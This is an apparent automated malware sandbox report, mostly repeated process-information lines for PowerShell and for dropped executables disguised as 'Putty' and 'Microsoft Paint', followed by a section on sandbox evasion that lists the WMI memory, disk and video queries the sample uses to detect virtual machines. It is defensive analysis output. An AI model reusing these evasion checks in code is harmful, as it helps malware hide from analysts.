Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
